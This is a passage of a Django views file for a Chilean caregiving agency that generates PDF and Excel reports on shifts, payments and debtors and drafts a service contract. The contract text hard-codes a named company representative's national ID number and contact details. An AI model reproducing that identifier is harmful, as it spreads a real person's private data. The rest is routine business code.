Abonos:\")\n\tc.drawString(536,fila-8,tot_abonos)\n\n\t# Balance due\n\tacum2 = str(\"{:,}\".format(acum2))\n\tacum2 = str(acum2).rjust(14,' ')\n\tc.drawString(470,fila-20,\"Saldo a pago: \")\n\tc.drawString(536,fila-20,acum2)\n\n\tfila = fila - 60\n\tcx = 35\n\tcy = fila - 68\n\n\t# header rectangle\n\tc.setFillColor(blue) # dark blue\n\tc.rect(cx,cy+78,550,20,fill=1) # rectangle behind the column headers\n\t\n\t# column headers\n\tc.setFillColor(white) # font colour\n\tc.drawString(cx+5,cy+85,\"# Dia Tur-1 Tur-2 Tur-3\"+\n\t\t\" Val-1 Val-2 Val-3 Val_tot Acum1\"+\n\t\t\" Abonos Acum Tot\")\n\n\tc.setFillColor(black)\n\tfor d in diarioaux:\n\t\tc.rect(cx,cy+60,550,17) # rectangle around each row\n\t\tc.drawString(40,fila,str(d.ndia))\n\t\tc.drawString(60,fila,d.cdia)\n\t\tc.drawString(120,fila,str(d.turno1))\n\t\tc.drawString(160,fila,str(d.turno2))\n\t\tc.drawString(200,fila,str(d.turno3))\n\t\tc.drawString(240,fila,str(d.valor_t1))\t\t\n\t\tc.drawString(280,fila,str(d.valor_t2))\t\t\n\t\tc.drawString(320,fila,str(d.valor_t3))\t\t\n\t\tc.drawString(360,fila,str(d.val_tot))\n\t\tc.drawString(420,fila,str(d.acum1))\n\n\t\tuu = str(\"{:,}\".format(d.abonos))\n\t\tc.drawString(480,fila,str(uu).rjust(7))\n\n\t\trr = str(\"{:,}\".format(d.acum2))\n\t\tc.drawString(530,fila,rr.rjust(7))\n\n\t\tfila = fila - 17\n\t\tcy = cy - 17\n\n\tc.showPage() # page break \n\tc.save() # write the file and close the canvas\n\n\t# launch the generated pdf (best effort, dev box only)\n\tos.system(nom_arch)\n\n\t# produccion\n\t#return FileResponse(open(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, 'rb'), content_type='application/pdf')\n\t\n\t# desarrollo\n\treturn FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')\n\n\ndef pdfdetalle2(request):\n\tfechahoy = datetime.now() \n\tancho, alto = letter\n\tnom_arch = \"detalle\"+nombrearch()+\".pdf\"\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\tc.setPageSize((ancho, alto))\n\t#\n\t# Deletes the previous PDF's from the PDFS folder\n\tpath_x = os.getcwd() +'\\\\pdfs\\\\'\n\tarch_y = os.listdir(path_x)\n\tfor arch_pdf in arch_y:\n\t\tremove(path_x+arch_pdf)\n\n\tqry = Diario_aux.objects.all().order_by('ndia') \n\tc.drawImage(logo_corp, 10, 710,190,80) # (IMAGE, X,Y, WIDTH, HEIGHT)\n\n\tc.setFont('Helvetica', 9)\n\tfila = 700\n\tc.drawString(220,fila, \"DETALLE DE PRESTACIONES\")\n\n\tdatos=[]\n\n\tfor d in qry:\n\t\tdatos.append([d.ndia,d.cdia,d.turno1,d.turno2,d.turno3,\n\t\t\td.valor_t1,d.valor_t2,d.valor_t3,d.val_tot,d.acum1,d.abonos,d.acum2])\n\n\t# bug fix: tabulate() returns the formatted table as a string; the original call\n\t# discarded it, so the table was never drawn. Render it line by line instead,\n\t# in a monospaced font so the space-aligned columns line up.\n\ttabla = tabulate(datos, headers=[\"#\",\"Dia\",\"Tur-1\",\"Tur-2\",\"Tur-3\",\"Val-1\",\"Val-2\",\"Val-3\",\"Val_tot\",\"Acum1\",\"Abon\",\"AcumT\"])\n\tc.setFont('Courier', 8)\n\tfila = fila - 20\n\tfor linea in tabla.splitlines():\n\t\tc.drawString(30, fila, linea)\n\t\tfila = fila - 12\n\n\tc.showPage() # page break \n\tc.save() # write the file and close the canvas\n\n\t# launch the generated pdf\n\tos.system(nom_arch)\n\n\treturn FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')
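\n\n\n# NOTE (added): every report view here rebuilds the month's fecha_ini/fecha_fin\n# strings by hand. A minimal sketch of a shared helper, assuming the same\n# 'YYYY-MM-DD HH:MM:SS' text format the raw queries expect; it is not yet wired\n# into the existing views.\ndef month_bounds(ano, mes):\n\t# e.g. month_bounds(2020, 4) -> ('2020-04-01 00:00:00', '2020-04-30 00:00:00')\n\ttotdias = calendar.monthrange(ano, mes)[1]\t# number of days in the month\n\tfecha_ini = str(ano)+\"-\"+str(mes).zfill(2)+\"-01 00:00:00\"\n\tfecha_fin = str(ano)+\"-\"+str(mes).zfill(2)+\"-\"+str(totdias)+\" 00:00:00\"\n\treturn fecha_ini, fecha_fin\n\n\n# CARTOLA DETALLE \n@login_required(login_url='login_ini')\ndef exceldetalle(request):\n\tnom_arch = nombrearch()\t# builds the string for the excel file name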
\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tstring_nombre = 'deta'+nom_arch\n\n\tusername_y = request.session.get('username_x')\t# session variable of the logged-in user \n\tqry = Diario_aux.objects.filter(username=username_y).order_by('fecha')\n\n\t# a queryset is never None nor ''; check for an empty result instead\n\tif not qry.exists():\n\t\treturn HttpResponse(\"No hay datos para el informe\")\n\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\tfor fe in qry:\n\t\tpaciente_x = fe.paciente\t\n\t\trut_x = fe.rut\n\t\tfecha_x = fe.fecha\n\t\tcdia_x = fe.cdia\n\t\tndia_x = fe.ndia\n\t\tmes_hoy = fecha_x.month\n\t\tmes_hoy = meses[mes_hoy - 1]\t# month in words\n\t\tano_hoy = fecha_x.year\n\n\t# pauta of the selected date only\n\tfecha_ini = str(ano_hoy)+\"-\"+str(fecha_x.month).zfill(2)+\"-01 00:00:00\"\n\t# total days in the month\n\ttotdias = calendar.monthrange(int(ano_hoy),meses.index(mes_hoy) + 1)[1] \n\tfecha_fin = str(ano_hoy)+\"-\"+str(fecha_x.month).zfill(2)+\"-\"+str(totdias)+\" 00:00:00\"\n\n\twb = Workbook()\n\tws = wb.create_sheet(\"hoja1\",0)\n\tws.column_dimensions['A'].width = 5 # narrow leading column\n\tws.column_dimensions['B'].width = 5\t # day number\n\tws.column_dimensions['C'].width = 10 # day in words\n\n\tws.column_dimensions['D'].width = 14 # paciente\n\tws.column_dimensions['E'].width = 14 # morning shift \n\tws.column_dimensions['F'].width = 14 # afternoon shift\n\n\tws.column_dimensions['G'].width = 10 # day-shift value\n\tws.column_dimensions['H'].width = 14 # afternoon-shift value\n\tws.column_dimensions['I'].width = 14 # night-shift value\n\n\tws.column_dimensions['J'].width = 14 # total value of the day\n\tws.column_dimensions['K'].width = 14 # running total\n\tws.column_dimensions['L'].width = 14 # payments\n\n\tws.column_dimensions['M'].width = 14 # accumulated balance\n\tws.column_dimensions['N'].width = 10 # receipt number\n\t\n\tr=13\t# position of the first row\n\n\t# Corporate logo\n\timg = XLIMG(logo_corp)\n\tws.add_image(img, 'A1')\n
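\n\t# NOTE (added): r=13, so rows r-10..r-8 are sheet rows 3..5; with column 12\n\t# ('L') they hold the letterhead that the ['L3','L4','L5'] font loop below styles.\n\tws.cell(row=r-10,column=12).value = \"Av. 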
Quilín 3151, Macul\"\t\n\tws.cell(row=r-9,column=12).value = \"Fono: (+56) 22 408 85 91\"\t\n\tws.cell(row=r-8,column=12).value = \"contacto@asistenciaintegral.cl\"\t\n\tfor l in ['L3','L4','L5']:\n\t\ta1 = ws[l]\n\t\ta1.font = Font(color=\"01019C\",size=14,bold=True)\n\n\tws.cell(row=r-2,column=2).value = \"Nombre:\"\n\tws.cell(row=r-2,column=4).value = paciente_x\n\tws.cell(row=r-1,column=2).value = \"RUT:\"\n\tws.cell(row=r-1,column=4).value = rut_x\n\n\tws.cell(row=r,column=2).value = \"Período:\"\n\tws.cell(row=r,column=4).value = mes_hoy+\"-\"+str(ano_hoy)\n\n\tfor l in ['B11','B12','B13','D11','D12','D13']:\n\t\ta1 = ws[l]\n\t\ta1.font = Font(color=\"01019C\",size=14,bold=True)\n\n\tr=r+3\n\tws.cell(row=r-1,column=2).value = \"Nª\"\n\tws.cell(row=r-1,column=3).value = \"Dia\"\n\tws.cell(row=r-1,column=4).value = \"Turnos Mañana\"\n\tws.cell(row=r-1,column=5).value = \"Turnos Tarde\"\n\tws.cell(row=r-1,column=6).value = \"Turnos Noche\"\n\tws.cell(row=r-1,column=7).value = \"Valor dia\"\n\tws.cell(row=r-1,column=8).value = \"Valor tarde\"\n\tws.cell(row=r-1,column=9).value = \"Valor noche\"\n\tws.cell(row=r-1,column=10).value = \"Valor Tot\"\n\tws.cell(row=r-1,column=11).value = \"Acumulado\"\n\tws.cell(row=r-1,column=12).value = \"Pagos\"\n\tws.cell(row=r-1,column=13).value = \"Sald.Acum.\"\n\tws.cell(row=r-1,column=14).value = \"Boleta\"\n\n\tfor l in ['B15','C15','D15','E15','F15','G15','H15','I15','J15','K15','L15','M15','N15']:\n\t\ta1 = ws[l]\n\t\ta1.font = Font(color=\"01019C\",bold=True)\n\n\tva1=0\t# Variables para acumular valores cuidador\n\tva2=0\n\ttot_turnos = 0 \n\tval_diario = 0\n\ttot_pagos = 0 # saldo anterior\n\t#abonosanti = anticipos(rut_x,fecha_ini,fecha_fin) # misfunciones\n\tk=0\n\tfor c in qry:\t# Diario_aux\n\t\tws.cell(row=r,column=2).value = c.ndia\t # numeral del dia\n\t\tws.cell(row=r,column=3).value = c.cdia \t # nombre del dia\n\t\tws.cell(row=r,column=4).value = c.turno1 \t\n\t\tws.cell(row=r,column=5).value = c.turno2 \n\t\tws.cell(row=r,column=6).value = c.turno3 \n\t\tws.cell(row=r,column=7).value = c.valor_t1 # valor dia\n\t\tws.cell(row=r,column=8).value = c.valor_t2\t\n\t\tws.cell(row=r,column=9).value = c.valor_t3\t\n\t\tws.cell(row=r,column=10).value = c.val_tot\t\n\t\tws.cell(row=r,column=11).value = c.acum1\n\t\tws.cell(row=r,column=12).value = c.abonos\n\t\tws.cell(row=r,column=13).value = c.acum2\n\t\tws.cell(row=r,column=14).value = c.boleta\n\t\t#\n\t\tif c.turno1 == None:\n\t\t\tc.turno1 = 0\n\t\tif c.turno2 == None:\n\t\t\tc.turno2 = 0\n\t\tif c.turno3 == None:\n\t\t\tc.turno3 = 0\n\t\tif c.val_tot == None:\n\t\t\tc.val_tot = 0\n\t\tif c.abonos == None:\n\t\t\tc.abonos = 0\n\n\t\ttot_turnos = tot_turnos + c.turno1 + c.turno2 + c.turno3 # sumas\n\t\tval_diario = val_diario + c.val_tot\n\t\ttot_pagos = tot_pagos + c.abonos\n\n\t\tr=r+1\n\t\tk=k+1\n\n\tws.cell(row=r,column=5).value = \"Sumas\"\n\tws.cell(row=r,column=6).value = tot_turnos\n\tws.cell(row=r,column=10).value = val_diario\n\n\t# Dibuja la grilla del informe\n\tthin_border = Border(\n \tleft=Side(border_style=BORDER_THIN, color='00000000'),\n \tright=Side(border_style=BORDER_THIN, color='00000000'),\n \ttop=Side(border_style=BORDER_THIN, color='00000000'),\n \tbottom=Side(border_style=BORDER_THIN, color='00000000')\n\t\t)\n\tcol = 2\n\tfil = 15\n\tfin_row = fil\n\twhile fil <= fin_row + c.ndia:\n\t\twhile col <= 14:\n\t\t\tws.cell(row=fil, column=col).border = thin_border\n\t\t\tcol = col + 1\n\t\tcol = 2\t\n\t\tfil = fil + 1\n\n\t# Colorea sumas\t\n\tfont_sumas = 
Font(name='Calibri',\n\t\t\tsize=11,\n\t\t\tbold=False,\n\t\t\titalic=False,\n\t\t\tvertAlign=None,\n\t\t\tunderline='none',\n\t\t\tstrike=False,\n\t\t\tcolor='FF000000')\t# plain black Calibri; no real highlight is applied\n\t# formats the sums row\n\tcol = 2\n\twhile col <= 14:\n\t\tws.cell(row=fil-1, column=col).font = font_sumas\n\t\tcol = col + 1\n\n\tresponse = HttpResponse(content_type='application/vnd.ms-excel')\n\tresponse['Content-Disposition'] = 'attachment; filename='+string_nombre+'.xlsx'\n\twb.save(response)\n\treturn response\n\n@login_required(login_url='login_ini')\ndef excelmensual(request):\n\tnom_arch = nombrearch()\t# builds the string for the excel file name\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tstring_nombre = 'mens'+nom_arch\n\tqry = Mensual_aux.objects.all().order_by('paciente') \n\n\t# a queryset is never None nor ''; check for an empty result instead\n\tif not qry.exists():\n\t\treturn HttpResponse(\"No hay datos para el informe\")\n\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\n\tfor men in qry:\t# mensual_aux\n\t\tmes_hoy = men.mes\n\t\tano_hoy = men.ano\n\t\tmes_hoy = meses[mes_hoy - 1]\t# month in words\n\n\twb = Workbook()\n\tws = wb.create_sheet(\"hoja1\",0)\n\tws.column_dimensions['A'].width = 5 # narrow leading column\n\t#\n\tws.column_dimensions['B'].width = 5\t # row number\n\tws.column_dimensions['C'].width = 45 # paciente\n\tws.column_dimensions['D'].width = 14 # contact phone\n\tws.column_dimensions['E'].width = 13 # total shifts \n\tws.column_dimensions['F'].width = 14 # monthly total\n\tws.column_dimensions['G'].width = 14 # previous balance\n\tws.column_dimensions['H'].width = 14 # deposits\n\tws.column_dimensions['I'].width = 14 # pending balance\n\tws.column_dimensions['J'].width = 14 # mobile phone\n\tws.column_dimensions['K'].width = 28 # Email\n\tws.column_dimensions['L'].width = 30 # last contact\n\n\tr=13\t# position of the first row\n\tfin_row = r\n\t# Corporate logo\n\timg = XLIMG(logo_corp) \n\tws.add_image(img, 'A1')\n
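\n\t# NOTE (added): r=13, so rows r-10..r-8 are sheet rows 3..5; the letterhead\n\t# actually lands in column 11 ('K'), matching the ['K3','K4','K5'] font loop\n\t# below (the original note said J3,J4,J5).\n\tws.cell(row=r-10,column=11).value = \"Av. 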
Quilín 3151, Macul\"\t\n\tws.cell(row=r-9,column=11).value = \"Fono: (+56) 22 408 85 91\"\t\n\tws.cell(row=r-8,column=11).value = \"contacto@asistenciaintegral.cl\"\t\n\tfor l in ['K3','K4','K5']:\n\t\ta1 = ws[l]\n\t\ta1.font = Font(color=\"01019C\",size=14,bold=True)\n\n\tws.cell(row=r-4,column=6).value = \"RESUMEN PRESTACIONES \"+mes_hoy+\"-\"+str(ano_hoy)\n\ta1 = ws['F9']\n\ta1.font = Font(color=\"01019C\",size=14,bold=True)\t\n\n\tws.cell(row=r-2,column=2).value = \"Nª\"\n\tws.cell(row=r-2,column=3).value = \"Paciente\"\n\tws.cell(row=r-2,column=4).value = \"Contacto\"\n\tws.cell(row=r-2,column=5).value = \"Tot.turnos\"\n\tws.cell(row=r-2,column=6).value = \"Tot.mensual\"\n\tws.cell(row=r-2,column=7).value = \"Sald.Anterior\"\n\tws.cell(row=r-2,column=8).value = \"Abonos\"\n\tws.cell(row=r-2,column=9).value = \"Sald.pdte\"\n\tws.cell(row=r-2,column=10).value = \"Movil\"\n\tws.cell(row=r-2,column=11).value = \"Correo\"\n\tws.cell(row=r-2,column=12).value = \"Ult.Contacto\"\n\n\tfor l in ['B11','C11','D11','E11','F11','G11','H11','I11','J11','K11','L11']:\n\t\ta1 = ws[l]\n\t\ta1.font = Font(color=\"01019C\",bold=True)\n\n\tk=1\n\tfor reg in qry:\n\t\tws.cell(row=r-1,column=2).value = k\t\t\t\t# correlativo\n\t\tws.cell(row=r-1,column=3).value = reg.paciente # nombre cuidador\n\t\tws.cell(row=r-1,column=4).value = reg.con \t # contacto\n\t\tws.cell(row=r-1,column=5).value = reg.turnos # total turnos\n\t\tws.cell(row=r-1,column=6).value = reg.val_mes # total $ mes\n\t\tws.cell(row=r-1,column=7).value = reg.saldoant # saldo anterior\n\t\tws.cell(row=r-1,column=8).value = reg.abonos # abonos\n\t\tws.cell(row=r-1,column=9).value = reg.saldo # saldo final\n\t\tws.cell(row=r-1,column=10).value = reg.celular # movil\n\t\tws.cell(row=r-1,column=11).value = reg.correo # correo apoderado\n\t\tws.cell(row=r-1,column=12).value = reg.n_apod # nombre apod \n\t\tr=r+1\n\t\tk=k+1\n\n\tthin_border = Border(\n \tleft=Side(border_style=BORDER_THIN, color='00000000'),\n \tright=Side(border_style=BORDER_THIN, color='00000000'),\n \ttop=Side(border_style=BORDER_THIN, color='00000000'),\n \tbottom=Side(border_style=BORDER_THIN, color='00000000')\n\t\t)\n\n\tcol = 2\n\tfil = 11\n\twhile fil <= k + fin_row:\n\t\twhile col <= 12:\n\t\t\tws.cell(row=fil, column=col).border = thin_border\n\t\t\tcol = col + 1\n\t\tcol = 2\t\n\t\tfil = fil + 1\n\n\tresponse = HttpResponse(content_type='application/vnd.ms-excel')\n\tresponse['Content-Disposition'] = 'attachment; filename='+string_nombre+'.xlsx'\n\twb.save(response)\n\treturn response\n\n\ndef ponenombresaldos(request):\n\tvariable1 = 'Mantención de Parametros'\n\tlogo = \"/static/img/Logo_AsistenciaIntegral.jpg\"\n\terror_new = 'error2'\n\tsal_x = Saldos.objects.all()\n\tx=0\n\tfor s in sal_x:\t\n\t\trut_x = s.rut\n\t\tpctes = Pacientes.objects.filter(rut=rut_x)\t\n\t\tfor pc in pctes:\n\t\t\tnombre_x = pc.nombre\n\t\n\t\ts.nombre = nombre_x\n\t\tx=x+1\n\t\ts.save()\n\n\tcontext = {\n\t\t\"error_new\":error_new,\n\t\t\"variable1\":variable1,\n\t\t\"logo_corp\":logo,\n\t\t\"x\":x,\n\t\t}\t\n\treturn render(request,'menuparametros.html',context) \n\n\n#def subefotos(request):\n#\tvariable1 = 'Subiendo fotos de asistentes'\n#\t#form = Cuidadores.objects.get(id=1)\n#\tif request.method == \"POST\":\t\n#\t\t#ruta = 'misitio/ai/static/img/fotos' # donde subirá\n#\t\tform = UploadFileForm(request.POST, request.FILES)\n#\t\thandle_uploaded_file(request.FILES['file'])\n#\t\t\n#\t\t#ruta = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\fotos\\\\\"\n#\t\t#fichero = 
request.POST.get('ruta')\t\t\n#\t\t#return HttpResponse(newdoc)\n#\n#\t\t#shutil.copyfile(fichero, ruta)\n#\tcontext\t= {\"variable1\":variable1,}\n#\treturn render(request,'subefotos.html',context)\n\ndef subefotos2(request):\n\tvariable1 = 'Subiendo fotos de asistentes'\n\tf = UploadDocumentForm()\n\tif request.method == \"POST\":\t\n\t\t#UPLOADER_FOLDER = '/staticfiles/img/'\t # server\n\t\tUPLOADER_FOLDER = 'misitio/ai/static/img/' # local\n\t\t# bug fix: the original mixed Flask idioms (secure.file_name, f.save, app.config)\n\t\t# into a Django view; read the upload from request.FILES and stream it to disk\n\t\tfrom django.utils.text import get_valid_filename # local import; the module header is elsewhere\n\t\tupload = request.FILES.get('fotito') # the <input type=\"file\" name=\"fotito\"> field\n\t\tif upload != None:\n\t\t\tfilename = get_valid_filename(upload.name)\n\t\t\twith open(os.path.join(UPLOADER_FOLDER,filename),'wb') as destino:\n\t\t\t\tfor chunk in upload.chunks(): # Django's chunked-upload pattern\n\t\t\t\t\tdestino.write(chunk)\n\tcontext\t= {\"variable1\":variable1,\"f\":f,}\n\treturn render(request,'subefotos.html',context)\n\n \ndef subefotos3(request):\n\tvariable1 = 'Subiendo fotos de asistentes'\n\tform = FormEntrada(request.POST, request.FILES)\n\tif request.method == 'POST':\n\t\tif form.is_valid():\n\t\t\ttitulo = request.POST['titulo']\n\t\t\ttexto = request.POST['texto']\n\t\t\tarchivo = request.FILES['archivo']\n\n\t\t\t# bug fix: the original passed the class name (archiv=Archivo) instead of the\n\t\t\t# uploaded file; the model field is assumed to be named 'archivo'\n\t\t\tinsert = Entrada(titulo=titulo, texto=texto, archivo=archivo)\n\t\t\tinsert.save()\n\t\t\tcontext = {\"variable1\":variable1,\"form\":form,}\n\t\t\treturn render(request,'menuparametros.html',context)\n\t\telse:\n\t\t\tmessages.error(request, \"Error al procesar el formulario\")\n\t# a GET, or a POST with an invalid form, falls through to the upload page\n\tcontext\t= {\"variable1\":variable1,\"form\":form,}\n\treturn render(request,'subefotos.html',context)\n\ndef subefotos(request):\n\t# the early return is intentional: photo uploads are handled from the admin\n\t# module, and the code below is kept only as a disabled reference\n\treturn HttpResponse(\"Este proceso se hace desde el modulo administrador..\")\n\tvariable1 = 'Subiendo fotos de asistentes '\n\tlogo_corp = \"/static/img/Logo_AsistenciaIntegral.jpg\"\n\tform = UploadFileForm(request.POST, request.FILES or None)\n\tif request.method == 'POST':\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn render(request,'menuparametros.html',{\"variable1\":variable1,\"logo_corp\":logo_corp,})\t\n\treturn render(request,'subefotos.html', {\"variable1\":variable1,})\n\n\n@login_required(login_url='login_ini')\ndef altacondeuda(request):\n\tlogo_excel = \"/static/img/EXCEL0D.ICO\"\n\tlogo = \"/static/img/Logo_AsistenciaIntegral.jpg\"\n\tvariable1 = \"Deudores a la fecha con o sin alta\"\n\tusername_y = request.session.get('username_x') # variable stored by the plantilla_base view \n\n\t# deletes only the logged-in user's rows from the mensual_aux scratch table\n\tcursor = connection.cursor() \n\tcursor.execute(\"delete from ai_mensual_aux where username = %s\",[username_y]) \n\n\tpaciente = Pacientes.objects.filter(estado=True).order_by('nombre') # only those flagged with estado \n\n\t# lazy queryset over Mensual_aux, evaluated later when the template renders\n\tmensual_aux = Mensual_aux.objects.all()\n\n\tcuenta = 0 \n\txcobrar_tot = 0\n\txcobrar_alta = 0\n\txcobrar_exis = 0\n\tfor pcte in paciente: \n\t\trut_x = pcte.rut\n\t\tpaciente_x = pcte.nombre\n\n\t\tfealta_x = '0000-00-00'\n\t\tif pcte.fe_alta != None:\n\t\t\tfealta_x = str(pcte.fe_alta)\n\t\t\tfealta_x = str(fealta_x[0:4])+\"-\"+str(fealta_x[5:7]).zfill(2)+\"-\"+str(fealta_x[8:10])\n\n\t\tcon_x = pcte.f_apod\t # guardian's contact phone\n\t\tmes_x = int(fealta_x[5:7].zfill(2))\n\t\tano_x = int(fealta_x[0:4])\n\t\tsaldo_deudor = Saldos.objects.filter(rut=rut_x,mes=mes_x,ano=ano_x)\n\n\t\tsaldodeudor = 0\n\t\tfor sal in saldo_deudor:\n\t\t\tsaldodeudor = sal.saldo\n\t\t\txcobrar_tot = xcobrar_tot + saldodeudor # running total\n\n
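\t\t# NOTE (added): only debtors with a positive balance in their discharge month\n\t\t# get a row in the per-user ai_mensual_aux scratch table\n\t\tif saldodeudor > 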
0:\n\t\t\tcursor.execute(\n\t\t\t\"insert into ai_mensual_aux (rut,paciente,con,celular,saldo,username,fe_alta)\"\n\t\t\t\"values(%s,%s,%s,%s,%s,%s,%s)\"\n\t\t\t,[rut_x,paciente_x,con_x,\n\t\t\tpcte.f_apod,saldodeudor,username_y,fealta_x])\n\n\t# totals the discharged (alta) and the active debtors separately\t\n\tfor tsaldos in mensual_aux:\n\t\tif tsaldos.fe_alta != None:\n\t\t\txcobrar_alta = xcobrar_alta + tsaldos.saldo\n\t\telse:\n\t\t\txcobrar_exis = xcobrar_exis + tsaldos.saldo\n\n\t\tcuenta = cuenta + 1\t\n\n\txcobrar = 0\n\tcontext ={\n\t\t\t\"variable1\":variable1,\n\t\t\t\"cuenta\":cuenta,\n\t\t\t\"mensual_aux\":mensual_aux,\n\t\t\t\"logo_corp\":logo,\n\t\t\t\"logo_excel\":logo_excel,\n\t\t\t\"logo\":logo,\n\t\t\t\"xcobrar_alta\":xcobrar_alta,\n\t\t\t\"xcobrar_exis\":xcobrar_exis,\n\t\t\t\"xcobrar_tot\":xcobrar_tot,}\n\treturn render(request,'grid_altacondeuda.html',context)\n\n\n## EVERYTHING BELOW THIS POINT IS TEST CODE, SLATED FOR REMOVAL ###############\n\n\n@login_required(login_url='login_ini')\ndef repo1(request):\n\tfechahoy = datetime.now()\n\tancho, alto = letter\n\tnom_arch = \"contrato\"+nombrearch()+\".pdf\"\n\n\t# produccion\n\t#logo_corp = os.getcwd()+\"/misitio/staticfiles/img/Logo_AsistenciaIntegral.jpg\"\n\t#c = canvas.Canvas(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, pagesize=letter)\n\n\t# desarrollo (the original created this canvas twice; once is enough)\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\n\tc.setPageSize((ancho, alto))\n\t#\n\trut_aux = request.session['rut_x']\t\t# 19042020\n\tpaciente = Pacientes.objects.get(rut=rut_aux) # 19042020\n\n\tif paciente.fe_ini == None:\n\t\treturn HttpResponse(\"Paciente no posee fecha de inicio\")\n\n\t# produccion\n\t#path_x = os.getcwd() +\"/misitio/pdfs/\"\n\n\t# desarrollo\n\tpath_x = os.getcwd() +'\\\\pdfs\\\\'\n\n\tarch_y = os.listdir(path_x)\n\tfor arch_pdf in arch_y:\n\t\tremove(path_x+arch_pdf)\n\n\trut_apod = paciente.rut_apod\t# nuevo 19042020\n\n\tcomu = Param.objects.filter(tipo='COMU',codigo=paciente.comuna)\n\tfor com in comu:\n\t\tcomu_x = com.descrip\n\t\n\tbanco_x = \" \"\n\tvalor_abono = 0\n\tif paciente.fe_ini != None: # there should never be a paciente without a start date\n\t\tfe_i = str(paciente.fe_ini)[0:10] # yields '9999-99-99', the paciente's start date\n\t\tfe_f = str(fechahoy)[0:10]\t\t # yields '9999-99-99', today's date\n\t\texiste = Anticipos.objects.filter(rut=paciente.rut,sw_abono=\"1\",fecha__range=(fe_i,fe_f)).exists()\n\n\t\tif existe==True:\n\t\t\tanticipo = Anticipos.objects.get(rut=paciente.rut,sw_abono=\"1\",fecha__range=(fe_i,fe_f))\n\t\t\t# anticipo.abon: 1=efectivo, 2=cheque, 3=tarjeta, 4=transferencia\n\t\t\tabono = Param.objects.filter(tipo='ABON',codigo=anticipo.abon)\n\t\t\tfor com in abono:\n\t\t\t\tabon_x = com.descrip\n\n\t\t\tvalor_abono = anticipo.valor\n\t\t\tcod_bco = anticipo.banco\n\t\t\tcheque_x = anticipo.cheque\n\t\t\tfe_che = str(anticipo.fecha)[0:10] # provisional; a dedicated field will be added to the ANTICIPOS table\n\n\tif existe==True: # an initial deposit (sw_abono=1) was found
\n\t\tbanco = Param.objects.filter(tipo='BCO',codigo=cod_bco)\n\t\tfor bco in banco:\n\t\t\tbanco_x = bco.descrip\n\n\telse:\n\t\tbanco_x = \"\"\n\t\tcheque_x = \"\"\n\t\tfe_che = \"\"\n\t\tabon_x = \"\"\n\n\t## FIRST PAGE BEGINS\n\tc.drawImage(logo_corp, 10, 710,190,80) # (IMAGE, X,Y, WIDTH, HEIGHT)\n\tc.drawString(160,690, \"CONTRATO DE PRESTACION DE SERVICIOS\")\n\tc.drawString(30,660, \"En Santiago de Chile a\")\n\tfe_x = fecha_palabra(paciente.fe_ini)\n\tc.drawString(155,660, fe_x)\n\n\tlen_x = len(fe_x) * 6\n\tc.drawString(155+len_x,660,\", se celebra el presente Contrato de Prestación de\")\n\tc.drawString(30,645,\"Servicios que suscribe por una parte\") # 15 below the previous line\n\tlen_x = 36 * 5.5\n\tc.drawString(30+len_x,645,paciente.n_apod)\n\tc.drawString(30,630, \"R.U.T.:\")\n\tc.drawString(30 + 7 * 5.5,630,paciente.rut_apod)\n\tc.drawString(150,630,\"con domicilio en\")\n\tc.drawString(240,630,paciente.dir_apod)\n\tc.drawString(30,615,\"comuna de \"+comu_x.strip()+\" Fono: \"+paciente.f_apod+\" correo \"+paciente.correo_apod+\" a quien se\")\n\tc.drawString(30,600,\"denominará más adelante como 'Cliente'; y de la otra parte Asistencia Integral Limitada\")\n\tc.drawString(30,585,\"R.U.T.: 76.191.893-1, representada por don Antonio Castillo Rojas, CI: 13.477.178-K \")\n\tc.drawString(30,570,\"ubicada en calle El Olivillo 6036, Peñalolen, email: contacto@asistenciaintegral.cl, fono: 22 408 85 91\")\n\tc.drawString(30,555,\"(Oficina comercial Avenida Quilin 3451, comuna de Macul) a quien se denominará como 'Prestador\")\n\tc.drawString(30,540,\"de servicios' bajo los términos y condiciones siguientes:\")\n\tc.drawString(30,520,\"PRIMERO: El cliente conviene contratar por voluntad propia al Prestador de Servicios para el cuidado\")\n\t# (an accidental duplicate of the next drawString was removed here)\n\tc.drawString(30,505,\"del Señor (a,ta): \"+paciente.nombre+\" CI:\"+paciente.rut+\" actual paciente de\")\n\tc.drawString(30,490,paciente.n_apod+\", este servicio deberá prestarse en forma independiente y autonoma\")\n\tc.drawString(30,475,\"asumiendo riesgos y responsabilidades propias de la actividad. El servicio basicamente consistirá en\")\n\tc.drawString(30,460,\"que los asistentes contratados por el Prestador de Servicios asistan al paciente, que por orden\")\n\tc.drawString(30,445,\"médica lo requiera y que se encuentre internado(a) en la institución de salud acreditada, en sus\")\n\tc.drawString(30,430,\"necesidades básicas, tales como aseo personal, alimentación, vestuario, deambulación y compañia.\")\n\tc.drawString(30,405,\"SEGUNDO: Las actividades de los Asistentes de Enfermos del Prestador de Servicios se efectuarán \")\n\tc.drawString(30,390,\"en : \"+paciente.localizacion+\"\")\n\tc.drawString(30,365,\"TERCERO: Este contrato se celebra entre el Cliente y el prestador de Servicios por cuanto los\")\n\tc.drawString(30,350,\"Asistentes no tendrán relacion de tipo Empleador a Trabajador con los Clientes. No obstante, estos\")\n\tc.drawString(30,335,\"últimos se 